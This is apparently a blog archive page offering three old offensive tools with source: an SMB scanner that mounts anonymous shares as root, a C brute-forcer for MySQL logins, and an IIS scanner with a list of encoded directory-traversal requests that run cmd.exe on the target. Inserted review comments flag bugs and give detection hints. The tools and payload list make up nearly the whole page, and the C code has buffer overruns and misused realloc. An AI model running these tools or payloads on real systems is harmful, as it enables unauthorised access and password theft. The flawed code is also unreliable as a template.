Archiv für den Monat: Januar 2013

Samba / Netbios network scanner (SMBScan) for Linux

A simple SMB scanner written in Bash for Linux, intended for older systems

smbscan-1.1.tar (Download all) for older systems (anno 2006)

smbscan.sh

#!/bin/bash
# This script scans smb servers a given network
# and mounts anonymous shared directories
# example: ./smbscan.sh or ./smbscan iprange
# http://www.bastardo.de/ 

# clean old temp files
#rm -f *.out

# The rest of the script mounts file systems and sends SIGKILL to other
# processes, so it refuses to run unless the effective user id is 0.
if [ `id -u` -ne 0 ]; then
  echo "You must be root to use this script."
  exit 1
fi

# File system type used to filter the `mount` listing at the end of the script.
FILESYSTEM=cifs
# Absolute paths of the external tools. Each one except dialog is mandatory
# and is checked with `test -x` below.
# NOTE(review): smbmount is the legacy Samba mount helper; the page describes
# this release as being for "older systems (anno 2006)", so it is presumably
# missing on current installations - confirm before relying on this path.
SMBM=/usr/bin/smbmount
SMBC=/usr/bin/smbclient
NMBL=/usr/bin/nmblookup
NMAP=/usr/bin/nmap
GREP=/bin/grep
SED=/bin/sed
DIALOG=/usr/bin/dialog
#WHIP=/usr/bin/whiptail
# Not referenced again in this listing; the mount call hard-codes iocharset=utf8.
CHARSET="iso8859-1"
# BUNT 1 = Console
# BUNT 0 = with Whiptail or dialog graphics
BUNT=1
# Seconds passed to `sleep` after each share listing in the host loop.
TIMEOUT=5

#test -x $WHIP
# Self-assignment: this line changes nothing, and a missing dialog binary is
# not treated as an error here.
test -x $DIALOG && DIALOG=$DIALOG
#test -x $WHIP || BUNT=0
# Abort early when a required tool is not executable at its configured path.
test -x $SMBM || { echo -e 'smbmount not found !';exit 1; }
test -x $SMBC || { echo -e 'smbclient not found !';exit 1; }
test -x $NMBL || { echo -e 'nmblookup not found !';exit 1; }
test -x $NMAP || { echo -e 'nmap not found !';exit 1; }
test -x $GREP || { echo -e 'grep not found !';exit 1; }
test -x $SED || { echo -e 'sed not found !';exit 1; }
# hehe i know that suxx ;)
# Clears the terminal before any further output.
clear

# Show the author's "protection" banner and terminate the script.
# Globals:  BUNT (read)   - 1 selects plain console output, anything else dialog
#           DIALOG (read) - path of the dialog binary
# Returns:  never returns; the shell exits with status 1
script_kiddie() {
  if ! [ $BUNT -eq 1 ]; then
    $DIALOG --title "v 1.1" --infobox " ScR1p7k1dDi3 Pr0t3c7 Sy5t3m" 6 20
  else
    echo "ScR1p7k1dDi3 Pr0t3c7 Sy5t3m v 1.1"
  fi
  exit 1
}
# Called unconditionally. script_kiddie ends in `exit 1`, so as published the
# script stops here and nothing below this line runs.
script_kiddie

# Obtain the address range: from the single command-line argument, or from a
# dialog input box (dialog reports the entered text on stderr, hence `2>`).
# Either way the text is stored in ./out in the current directory.
# NOTE(review): the script runs as root and writes fixed file names (./out and
# others) into whatever directory it was started from. In a directory other
# users can write to, an existing file or symlink of that name would be
# overwritten - a private directory from `mktemp -d` avoids that.
if [ $# -eq 1 ]
then
    echo "$1" > ./out
        else
	    $DIALOG --title "SMBscan v.1.1" --inputbox "                Written by cd ;)

Please enter IP range
e.g 10.0.0.1-24 or 10.0.1-255.5-30
or type ./smbscan 10.0.0.1-254

http://www.bastardo.de <- get newest version" 13 50 2> ./out
fi

# Measure ./out and publish its size in bytes.
# Globals:  X (written)   - raw `wc -c` result for ./out
#           SUM (written) - the same count passed through expr; 0 means the
#                           file is empty or could not be read
check_it() {
  X=$(cat ./out | wc -c)
  SUM=$(expr 0 + $X)
}
# Console banner. It prints $1, which is empty when the range was entered
# through the dialog box instead of the command line.
if [ $BUNT -eq 1 ]
    then
#	test -e $1 || { echo -e "$0 [ip room]"; exit 1; }
	    echo "Written by cd ;)"
	    echo "Scan started against to $1 on port 139"
	    echo "This can take a while"
fi

# Sets SUM from the size of ./out; the value is not tested before it is
# recomputed by the second check_it call further down.
check_it
# The range is read back from ./out and the file is removed.
IP=`cat ./out`
rm -f ./out
# i think that is the fastest, we whant to scan only 1 port ... not more 
# nmap options: -p 139 (one port), -PN (no host discovery), -T 5 (fastest
# timing template), -sT (full TCP connect), -v -v (verbose), -oG (grepable
# output file). Only the "Host" lines are shown on the terminal.
# A connect scan completes the TCP handshake on every reachable host, so it is
# visible in connection logs of the scanned machines and of firewalls in between.
# NOTE(review): $IP is used unquoted and unvalidated, both on the nmap command
# line and inside the output file name; extra words in the input become extra
# nmap arguments. Checking the value against the expected range syntax before
# this line would close that.
$NMAP -p 139 -PN -T 5 -sT -v -v $IP  -oG ./$IP.out | $GREP Host
# Keep the second space-separated field (the address) of every grepable line
# that reports 139/open; the result is the host list in ./out.
cat ./$IP.out | $GREP "139/open" | cut '-d ' -f 2 > ./out
rm -f ./$IP.out
# SUM is 0 when the host list is empty: report that, clean up and exit 1.
check_it
if [ $SUM = 0 ]
    then 
	if [ $BUNT -eq 1 ]
	    then
echo "
    No SMB Server found.

      Thanks for use ..."
		rm -f ./out
		exit 1
		    else
			$DIALOG --title "Sorry" --infobox "
    No SMB Server found !

      Thanks for use ... " 7 30
			rm -f ./out
			exit 1
	fi
fi

# Progress message before the per-host work starts.
if [ $BUNT -eq 1 ]
    then
	echo "Please wait...
      Searching 4 Shared Directories"
	else
	    $DIALOG --infobox "Please wait !
Searching 4 Shared Directories..." 5 40
fi
# One iteration per address in ./out (the hosts with port 139 open).
# Everything learned about a host below - its name, workgroup and share names -
# comes from that host's own replies and is therefore untrusted input.
while read host ;
    do
	# Get Computer name
	# nmblookup -A asks the host for its NetBIOS name table; the first column
	# of the <00> "B <ACTIVE>" line is taken as the computer name.
	echo "Try $host..."
        echo "Searching Name via nmblookup (B)"
	name=`$NMBL -A $host | $GREP "<00> -         B <ACTIVE>" | awk '{print $1}'`

	# Get Workgroup name
	workgroup=`$NMBL -A $host | $GREP "<00> - <GROUP>" | awk '{print $1}'`

	# if name not set so use this one
	workgroup=${workgroup:=WORKGROUP}

	# Fallback chain: each step replaces an empty name with a sentinel value
	# and the next test uses that sentinel to decide whether to try another
	# lookup (M line, H line, then the smbclient server listing).
	# NOTE(review): $name is unquoted in the [ ] tests; a lookup that returns
	# more than one word makes the test fail with a syntax error.
	name=${name:=IG_IT_IG_IT}

if [ $name = "IG_IT_IG_IT" ]
    then
	echo "Searching name via nmblookup (M)"
	name=`$NMBL -A $host | $GREP "<00> -         M <ACTIVE>" | awk '{print $1}'`
    fi 
    name=${name:=NONAME}

if [ $name = "NONAME" ]
    then
	echo "Searching Name via nmblookup (H)"
	name=`$NMBL -A $host | $GREP "<00> -         H <ACTIVE>" | awk '{print $1}'`
    fi
    name=${name:=NO_NAME}

if [ $name = "NO_NAME" ]
    then
	echo "Searching Name via Smbclient ... using Servername"
	name=`$SMBC -N -L $host -g | grep Server | awk {'print $1'} | cut -d '|' -f 2`
    fi
    # Last resort when no lookup produced a name.
    name=${name:=NAME_NOT_FOUND}

	# search for shared folders
	echo "looking for shared directorys on $host"
	# kill old sleep process
	# NOTE(review): `2&>1` is not `2>&1`. The shell reads it as the argument
	# `2` followed by `&>1`, so kill receives 2 as an additional PID and the
	# output lands in a file named ./1. The command also sends SIGKILL to
	# every process called sleep on the machine, not only ones started here.
	kill -9 `pidof sleep` 2&>1
	# Anonymous (-N) share listing in grepable form (-g) on port 139; the
	# second '|'-separated field of each "Disk" line is the share name.
	$SMBC -W "$workgroup" -n "fuckup" -N  -L $host -g -p 139 | grep Disk | cut -f 2 -d '|'  > ./$host.shares 
        # set Timeout to kill connections that take to long 10 sec is ok i think
	# NOTE(review): smbclient above runs in the foreground, so it has already
	# finished when sleep starts, and the kill only runs if sleep itself
	# fails. This line delays each host by $TIMEOUT seconds (5, not 10) but
	# does not limit how long smbclient may take.
	sleep $TIMEOUT || kill -9 `pidof $SMBC` 2&>1

	    # exist is set to 1 on every iteration, so the later test on it is always true.
	    exist=0
	    # One iteration per share name reported by the host.
	    # NOTE(review): $name and $LIST are used verbatim as path components
	    # for mkdir -p and as the mount target, as root. Nothing here rejects
	    # `..`, `/` or a leading `-` in a name sent by the remote host, and
	    # `read` without -r interprets backslashes. Validate both values
	    # before building paths from them.
	    while read LIST ;
	    		do
		    exist=1
		    #make directory for the shares
		    mkdir -p ./"$name-$host/$LIST"
		    #add a logfile
		    #touch ./"$name-$host/ip-is-$host"
		    # Guest mount of the share onto the directory just created.
		    # NOTE(review): the options do not include nosuid, nodev or
		    # noexec although the share content is controlled by the
		    # remote host - consider adding them.
		    $SMBM "//$host/$LIST" "./$name-$host/$LIST" -o defaults,guest,iocharset=utf8

			# The message is printed after the mount attempt, and the
			# dialog variant shows ./$name/$LIST although the real mount
			# point is ./$name-$host/$LIST.
			if [ $BUNT -eq 1 ]
			    then
				echo "trying to mount //$host/$LIST into ./$name-$host/$LIST"
			    else
				$DIALOG --infobox  "trying to mount //$host/$LIST into ./$name/$LIST" 10 60
			fi
		if [ $exist = 1 ]
		then
		    #write some useful or not very useful informations into a log 
		    # Appends name, address, timestamp and the matching `df -h`
		    # lines to ./<name>-<host>/ip-is-<host>, once per share.
		    echo " 
		    $name - $host
		    Last found: `date`
		    Mapped    : `df -h | grep $host`" >> ./"$name-$host/ip-is-$host" 
		fi
	    done < ./$host.shares
#	    echo `mount | $GREP cifs | grep $host` >> ./"$name-$host/ip-is-$host"

# The per-host share list is temporary.
rm -f ./$host.shares
done < ./out

# Final report: collect every mount line that mentions $FILESYSTEM (cifs) in
# ./mounts and show it on the console through `more` or in a dialog text box.
# The filter is not limited to mounts made by this run.
mount | $GREP $FILESYSTEM > ./mounts
if [ $BUNT -eq 1 ]
    then
	echo "
SMBScan v 1.1 -> listing mounted smb file systems

`cat ./mounts | more`
"
    else
	$DIALOG --title "SMBScan v 1.1 -> listing mounted smb file systems" --textbox mounts 10 60
fi
# Remove the working files; the mounted shares and the ./<name>-<host>
# directories stay in place until the unmount script is run.
rm -f ./mounts
rm -f ./out

 

The unmount script

umount.sh

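#!/bin/sh
# Unmount the SMB/CIFS shares that smbscan.sh mounted below the current
# directory (layout: ./<name>-<host>/<share>) and kill leftover mount.cifs
# helper processes. Run it from the directory smbscan.sh was started in.
#get forced
echo "unmounting smb file systems (force)"

# Walk the three-level glob entry by entry: an unmatched pattern stays literal
# and plain files cannot be mount points, so both are skipped instead of being
# handed to umount. The ./ prefix keeps a name starting with '-' from being
# read as an option.
for share_dir in */*/*; do
  [ -d "$share_dir" ] || continue
  umount "./$share_dir"
done
#umount `mount | grep smbfs | awk '{print $3}'`

# The bracket in '[m]ount.cifs' keeps the grep process itself out of the list.
pids=`ps aux | grep '[m]ount.cifs' | awk '{print $2}'`
if [ -n "$pids" ]; then
  # Deliberately unquoted: one PID per word. kill is skipped when there is
  # nothing to signal, instead of failing on an empty argument list.
  kill -9 $pids
fi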

 

The Makefile for „make install“

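# Installation directory. Keep the trailing slash: the uninstall rules append
# the file names to it directly.
PREFIX=/usr/sbin/

# install and uninstall are commands, not files; without this a file of the
# same name in the source directory would make the target look up to date.
.PHONY: install uninstall

# Copies both scripts into $(PREFIX); they keep the mode they have in the
# source directory.
# NOTE(review): the page lists the unmount script as umount.sh, while these
# rules expect umountall.sh - confirm the file name shipped in the tarball.
install:
	@cp smbscan.sh $(PREFIX)
	@cp umountall.sh $(PREFIX)

# Removes the two installed scripts again.
uninstall:
	@rm $(PREFIX)smbscan.sh
	@rm $(PREFIX)umountall.sh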

 

 

MySQL Bruteforce for Linux and Windows

Linux Source and Binaries

mysql-bruteforce.c (Sourcecode)
mysql-bruteforce.tar
(sourcecode tarball)
mysql-bruteforce-binary-only.tar (compiled Binary)
You need to install ncurses

apt-get install libncurses5-dev libncurses5

Windows Source and Binaries

mysql-bruteforce-win32.tar (sourcecode tarball)
pdcurses.dll (PDCurses.dll)
libmySQL.dll (libmySQL.dll)
mysql-bruteforce-win32.c SourceCode for Windows

Here is the Source (Linux)

#include <stdio.h>
#include <mysql/mysql.h>
#include <curses.h>
#include <string.h>
#include <stdlib.h>

// UI language switch (German or English). The message blocks in main are
// selected with `#if ENG && !GER`: English needs ENG 1 and GER 0, every other
// combination builds the German texts.
#define GER 1
#define ENG 0
/*
**************************************************************************************************
*  MYSQL Bruteforce Programm aus purer lange Weile geschrieben 
*   23.03 2010 by cd 
*
*   gcc mysql-bruteforce.c -o mysql-bruteforce -lmysqlclient -lncurses -O2 -Wall
*   oder -O6 anstatt -O2
*  ./mysql-bruteforce benutzer computer kennwortliste <optional länge des kennworts>
*  log Datei ist "mysql-bruteforce.log"
*
**************************************************************************************************
**************************************************************************************************
*
*  for the people that understand no german change the #define ENG to 1 and GER to 0
*
*  compile with: gcc mysql-bruteforce.c -o mysql-bruteforce -lmysqlclient -lncurses -O3 -Wall
*  or -O6 instead of -O2
*  usage: ./mysql-bruteforce user host <password list> <optional len of password>
*  log file is "mysql-bruteforce.log"
*
**************************************************************************************************
*
*   Newest version http://bruteforce.at/mysql
*
*   Think about the old good time MoD
*   If you want to survive out here, you've got to know where your towel is.
*/

// MySQL client handle; created with mysql_init() in main and passed to every
// mysql_real_connect() call.
MYSQL *my;

// Incremented once per iteration of the -b candidate loop; not read anywhere
// in this listing.
int count=0;
// Not referenced in this listing.
char *passwd;

// Character range used by the -b mode. The numbers in the original notes (33
// and 127) are presumably alternative bounds the author considered.
#define STARTCHR 46 // first generated character, ASCII 46 ('.')
#define ENDCHR 122  // last generated character, ASCII 122 ('z')
#define BUFF_SIZE 1024 // size in bytes of the word-list line buffer below
#define LEN 80 // not referenced in this listing

// Receives one word at a time from the word list.
char buffer[BUFF_SIZE];
// Mode flag set in main: 1 when argv[3] is "-b", otherwise 0 (word-list mode).
int jump=0;

/*
 * Entry point. Tries passwords for one MySQL account, either generated
 * (argv[3] is "-b") or read from a word list (argv[3] is a file name), and
 * appends a successful combination as user:pass@host to mysql-bruteforce.log.
 *
 * argv[1] user, argv[2] host, argv[3] word list or -b, argv[4] optional
 * length, argv[5] optional start word (-b mode).
 * Returns 0 on every path except a failed realloc, which returns 1.
 *
 * Every candidate is a separate mysql_real_connect() call, so on the server a
 * run appears as a long series of failed logins for one account from one
 * client address.
 * NOTE(review): server-side throttling such as MySQL's FAILED_LOGIN_ATTEMPTS /
 * PASSWORD_LOCK_TIME account options or the connection_control plugin is the
 * usual countermeasure - confirm availability for the server version in use.
 */
int main (int argc, char *argv[])
{
// Fewer than three arguments after the program name: print usage and stop.
if (argc <= 3 )
    {
#if ENG && !GER
    printf("\n"
    "\n   MySQL Bruteforce, written by cd\n\n"
    "    via wordlist\n"
    "    %s root localhost wordlist       # use complete wordlist\n"
    "    %s root 127.0.0.1 ../wordlist 7  # serch only words with 7 chars\n"
    "\n"
    "    standard bruteforce\n"
    "    %s root localhost -b      # Bruteforce Method (standard up to 8 chars)\n"
    "    %s root 127.0.0.1 -b 12   # up to 12 chars\n"
    "    %s root host -b 12 Test   # start with the given Word\n\n\n\n\n",argv[0],argv[0],argv[0],argv[0],argv[0]);
#else
    printf("\n"
    "\n   MySQL Bruteforce, geschrieben von cd\n\n"
    "    via Wörterliste\n"
    "    %s root localhost wordlist       # Gesamte Wörterliste durchsuchen\n"
    "    %s root 127.0.0.1 ../wordlist 7  # suche nur Wörter mit 7 Buchstaben\n"
    "\n"
    "    Standard Bruteforce\n"
    "    %s root localhost -b      # Bruteforce Methode (standard bis zu 8 Buchstaben)\n"
    "    %s root 127.0.0.1 -b 12   # bis zu 12 Buchstaben\n"
    "    %s root host -b 12 Test   # Startet mit angegebenen Wort\n\n\n\n\n",argv[0],argv[0],argv[0],argv[0],argv[0]);
#endif
    return 0;
    }

// strcmp() is non-zero when argv[3] differs from "-b": jump=0 selects the
// word-list mode, jump=1 the generated-candidate mode.
if(strcmp(argv[3],"-b")) 
    {
	jump=0;
    } else jump=1;

    // From here on the terminal is in curses mode; every exit path below calls endwin().
    initscr();
    printw("\n#################################\n#\tMYSQL Bruteforce\t#\n#\t2010 by cd\t\t#\n#################################\n\n\t\n");
    refresh();

    // Fixed 20-byte copies of argv[2] and argv[1], filled further down.
    char host[20];
    char user[20];
    my = mysql_init(NULL);
    FILE *pass_list,*logfile;

// The fopen() is attempted in both modes; its failure is only fatal in
// word-list mode (jump!=1).
if( ( pass_list=fopen(argv[3],"r") ) == NULL && jump!=1 ) 
{
#if ENG && !GER
fprintf(stderr,"Cannot open File \"%s\"\n", argv[3]);
#else
fprintf(stderr,"Kann Datei \"%s\" nicht oeffnen.\n", argv[3]);
#endif
endwin();
return 0;
}

// Log file in the current directory, opened for appending.
// NOTE(review): the error message prints argv[3] although the file that
// failed to open is mysql-bruteforce.log.
if( ( logfile=fopen("mysql-bruteforce.log","a+") ) == NULL )
{
#if ENG && !GER
fprintf(stderr,"Cannot open File \"%s\"\n", argv[3]);
#else
fprintf(stderr,"Kann Datei \"%s\" nicht oeffnen.\n", argv[3]);
#endif
endwin();
return 0;
}

    // Result of the mysql_init() call made above.
    if(my == NULL)
	{
#if ENG && !GER
	    fprintf(stderr, "Initialization failed\n");
#else
	    fprintf(stderr, "Initialisierung fehlgeschlagen\n");
#endif
	    endwin();
	    return 0;
	}

// NOTE(review): unbounded copies into 20-byte stack buffers; an argument of
// 20 characters or more writes past the end of user/host.
sprintf(user, "%s", argv[1]);
sprintf(host, "%s", argv[2]);

// "eingabe" (input) carries the mode into the switch: 'b' or 'w'.
char eingabe;

#if ENG && !GER
mvprintw(5,2,"User: %s Host: %s ",user,host);
#else
mvprintw(5,2,"Benutzer: %s Server: %s ",user,host);
#endif

if (jump==1)
{
refresh();
eingabe='b';

}
else {eingabe='w';}

// Only case 'b' exists; 'w' falls out of the switch into the word-list loop
// after it.
switch(eingabe)
{
case 'b':
// Every path through this loop body returns, so it runs at most once.
while(1)
{
    // Candidate lengths run from min to max; max defaults to 8 or comes from argv[4].
    int min=1,max;
    if (argc<=4)
	{
	    max=8;
	}
	    else 
	    {
		max=atoi(argv[4]); 
	    }

    // NOTE(review): the allocation is min (1) byte, yet pass[min] is written
    // below, one byte past the end, and pass[0] is never initialised before
    // the first connection attempt.
    char *pass=(char*)malloc(min);
    int pos,x,found; 

	    pass[min]='\0';

    // Optional start word: its length must equal the number given after -b.
    // NOTE(review): pass is redirected to argv[5], so the malloc'ed byte is
    // leaked, pass[min+1] is written beyond the string's terminator, and the
    // realloc() further down would be applied to a pointer that did not come
    // from malloc.
    if (argc>=6)
	{ 
	    min=strlen(argv[5]);
	    pass=argv[5];
	    pass[min+1]='\0';
	    pos=min;
	    if (atoi(argv[4])!=strlen(argv[5]))
		{
#if ENG && !GER
		 mvprintw(7,0,"len of word must be the same the digit after -b\n"
		 "like: %s root localhost -b 4 abcd\n",argv[0]);
#else
		 mvprintw(7,0,"länge des Wortes muss die gleiche seien wie die zahl nach -b\n"
		 "z.B: %s root localhost -b 4 abcd\n",argv[0]);
#endif
		 refresh();
		 endwin();
		 return 0;
		 }

	}

    // One pass per candidate length x.
    for(x=min;x<=max;x++)
	{
	    if(x>min)
		{
		    // NOTE(review): the pointer returned by realloc() is discarded,
		    // so pass may refer to freed memory afterwards; x bytes are
		    // requested but pass[x] is written, again one past the end.
		    if (realloc(pass, x)) 
			{
			    memset(pass, STARTCHR, x);
			    pass[x]='\0';
			} else {
				    mvprintw(13,1,"error in realloc");
				    endwin(); 
				    return 1;
				}
		}
	    // Runs until the first character reaches ENDCHR.
	    while(pass[0]<ENDCHR)
		{
		    found=0;
		    // NULL means the login failed: show the candidate and continue.
		    if( mysql_real_connect (my,host,user,pass,NULL,0,NULL,0)  == NULL)
			{
			    move(6,2);
			    deleteln();
			    mvprintw(6,2,"Pass: %s",pass);
			    refresh();
			}
			else
			    {
				// Login accepted: display it, append it to the log file and stop.
				move(6,2);
				deleteln();
				mvprintw(6,2,"Pass: %s",pass);
				refresh();
#if ENG && !GER
				mvprintw(8,2,"Login Success:\t %s:%s@%s\n",user,pass,host);
#else
				mvprintw(8,2,"Login Erfolgreich:\t %s:%s@%s\n",user,pass,host);
#endif
				refresh();
				endwin();
				mysql_close(my);
				fprintf(logfile,"%s:%s@%s\r\n",user,pass,host);
				return 0;
			    }

		    // Carry step: the right-most position (index > 0) holding ENDCHR
		    // is reset together with everything after it, and the character
		    // before it is advanced.
		    for(pos=x-1;pos!=0;pos--)
			{
			    if(pass[pos]==ENDCHR)
				{
				    memset(pass+pos, STARTCHR, strlen(pass)-pos);
				    pass[pos-1]++;
				    found=1;
				    break;
				}
			}

		    // Without a carry only the last character advances.
		    // NOTE(review): despite the indentation, count++ is not part of
		    // the if and runs on every iteration.
		    if(!found)
			pass[x-1]++;
			count++;
		}
	}

    // All lengths tried without a successful login.
    move(6,2);
    deleteln();
#if ENG && !GER
    mvprintw(8,2,"Password not found for %s@%s :/",user,host);
#else
    mvprintw(8,2,"Passwort fuer %s@%s nicht gefunden :/",user,host);
#endif
    refresh();
    endwin();
    mysql_close (my);
    return 0;
}
break;
}

// Word-list mode: one whitespace-delimited word per fscanf() call.
// NOTE(review): "%s" carries no field width, so a word of BUFF_SIZE characters
// or more overruns buffer.
int dummy;
while((fscanf(pass_list, "%s\r\n", buffer))!=EOF)
{
    // With a length argument, words of any other length are skipped.
    if (argv[4])
	{
	    if (strlen(buffer)!=atoi(argv[4])) goto next; // blubb goto i know ^^ phuu
	}

    // NULL means the login failed: show the word and continue with the next one.
    if( mysql_real_connect (my,host,user,buffer,NULL,0,NULL,0)  == NULL)
	{
	    move(6,2);
	    deleteln();
	    mvprintw(6,2,"Pass: %s",buffer);
	    refresh();
	}
	else
	    {
		// Login accepted: display it, append it to the log file and stop.
		move(6,2);
		deleteln();
		mvprintw(6,2,"Pass: %s",buffer);
		refresh();
#if ENG && !GER
		mvprintw(8,2,"Login Success:\t %s:%s@%s\n",user,buffer,host);
#else
		mvprintw(8,2,"Login Erfolgreich:\t %s:%s@%s\n",user,buffer,host);
#endif
		refresh();
		endwin();
		mysql_close(my);
		fprintf(logfile,"%s:%s@%s\r\n",user,buffer,host);
		return 0;
	    }
// A label must be followed by a statement; the assignment exists only for that.
next:
dummy=1;
}

    // Word list exhausted without a successful login.
    move(6,2);
    deleteln();
#if ENG && !GER
    mvprintw(8,2,"Password not found for %s@%s :/",user,host);
#else
    mvprintw(8,2,"Passwort fuer %s@%s nicht gefunden :/",user,host);
#endif
    refresh();
    endwin();
    mysql_close (my);
    return 0;
}

 

 

IISscan shell script

IIS Scanner

you can find this script also at http://packetstormsecurity.com/

head.cmd

HEAD / HTTP/1.0

iisscan.sh

#!/bin/sh
# A Simple IIS network scanner
# ./iisscan.sh 10.*.54.3-23 output
# http://www.bastardo.de(Apache) ;)
#
# Arguments: $1 - address range in nmap syntax, $2 - name of the output file
# Working files in the current directory: $1.out, hosts.$1.tmp, fluff, $2 and
# $2.exp; head.cmd and unicodes.txt are read as input.
# As published, both branches of the argument check below exit, so none of the
# scanning code after it is reached.
# NOTE(review): $1 and $2 are expanded unquoted throughout, including in file
# names; a range written with `*` (as in the usage line above) is subject to
# pathname expansion in the current directory.
clear
if [ $# -ne 2 ]
    then
	# Wrong argument count: the usage line goes to stderr, the exit status is 0.
	echo "$0 [ip room] [outputfile]" >&2
	exit 0
	else
	    echo "Written by cd ;)"
	    # Unconditional exit with status 1; the rest of this branch is unreachable.
	    echo "ScR1p7k1dDi3 Pr0t3c7 Sy5t3m v 1.o";exit 1
	    echo "Scan started against to $1 on port 80"

	echo "This can take a while"
	# SYN scan (-sS) of port 80 with the Aggressive timing template; grepable
	# results go to $1.out, and the address field of every line containing
	# "open" is written to $2.
	nmap -T Aggressive -v -v -sS $1 -p 80 -oG $1.out | grep Host
	cat $1.out | grep open | cut '-d ' -f 2 > $2
	fi
rm $1.out
# Recurring pattern in this script: the byte count of a file is run through
# expr, and 0 means that the step found nothing.
sum=0
g=`cat $2 | wc -c`
sum=`expr $sum + $g`
if [ $sum = 0 ]
    then 
echo "
      No matches of any http server!!!

      Thanks for use ..."
	rm $2
	exit 1
    fi

echo "Please wait... 
      Testing server versions"
    # Banner check: send the request stored in head.cmd to each host (5 second
    # timeout) and keep the Server: header line when it mentions IIS, with the
    # header name replaced by the host address.
    while read host ;
	do 
	     echo "         Get http server version from: $host"
	    netcat -w 5 $host 80 < head.cmd | grep "^Server: " | sed "s/^Server:/$host/" | grep "IIS" >>hosts.$1.tmp
	done < $2
sum=0
g=`cat hosts.$1.tmp | wc -c`
sum=`expr $sum + $g`
if [ $sum = 0 ]
    then 
echo "
      No matches of IIS 

      Thanks for use ..."
	rm hosts.$1.tmp
	rm $2
	exit 1
    fi
# $2 is rewritten to hold only the addresses of the hosts that answered as IIS.
rm $2
cat hosts.$1.tmp | cut '-d ' -f 1 > $2
rm hosts.$1.tmp
touch $2.exp
# For every IIS host, each line of unicodes.txt is sent as a request (10 second
# timeout). A response containing 'Directory of c:' is taken as the sign that
# the request was executed, and the host is appended to $2.exp - once per
# matching request line, so duplicates are possible.
# For defenders: every request line asks for cmd.exe or root.exe, mostly via
# encoded `..` sequences, which makes this traffic easy to spot in web server
# access logs and in IDS rules.
while read host;
 do 
 echo "Try to Exploit $host"
 while read unicodes;
 do
 echo "$unicodes" | netcat -w 10 $host 80 | grep 'Directory of c:' >fluff
 sum=0
    g=`cat fluff | wc -c`
    sum=`expr $sum + $g`
    if [ $sum = 0 ]
	then 
	    echo "try $unicodes"
	    else 
		echo "$host is Exploitable with $unicodes"
		echo $host >>$2.exp
    fi
    done < unicodes.txt
 done < $2
# fluff is the scratch file holding the most recent filtered response.
rm fluff
sum=0
g=`cat $2.exp | wc -c`
sum=`expr $sum + $g`
if [ $sum = 0 ]
    then 
	rm $2.exp
echo "

      No matches of Exploitable IIS
      In  >> $2 <<  you can find the IIS in this network

      Thanks for use ... 
      "
	exit 1
    fi
# Final summary: $2.exp lists the hosts that matched, $2 all IIS hosts found.
echo "

      You can find a list of Exploitable IIS in >> $2.exp << 
      and in >> $2 <<  you can find the IIS in this network

      Thanks for use ... 
      "

an old list of Unicodes
unicodes.txt

GET /scripts/.%252e/.%252e/winnt/system32/cmd.exe?/c+dir+c:\
GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir
GET /MSADC/root.exe?/c+dir
GET /PBServer/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir
GET /PBServer/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir
GET /PBServer/..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir
GET /PBServer/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
GET /Rpc/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir
GET /Rpc/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir
GET /Rpc/..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir
GET /Rpc/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
GET /_vti_bin/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63../winnt/system32/cmd.exe?/c+dir
GET /_vti_bin/..%%35c..%%35c..%%35c..%%35c..%%35c../winnt/system32/cmd.exe?/c+dir
GET /_vti_bin/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63../winnt/system32/cmd.exe?/c+dir
GET /_vti_bin/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir
GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
GET /_vti_bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir
GET /_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir
GET /_vti_cnf/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
GET /_vti_cnf/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir
GET /adsamples/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
GET /adsamples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir
GET /c/winnt/system32/cmd.exe?/c+dir
GET /cgi-bin/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
GET /cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir
GET /d/winnt/system32/cmd.exe?/c+dir
GET /iisadmpwd/..%252f..%252f..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir
GET /iisadmpwd/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir
GET /msaDC/..%%35%63..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir
GET /msaDC/..%%35c..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir
GET /msaDC/..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir
GET /msaDC/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
GET /msadc/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir
GET /msadc/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir
GET /msadc/..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir
GET /msadc/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir
GET /msadc/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
GET /msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
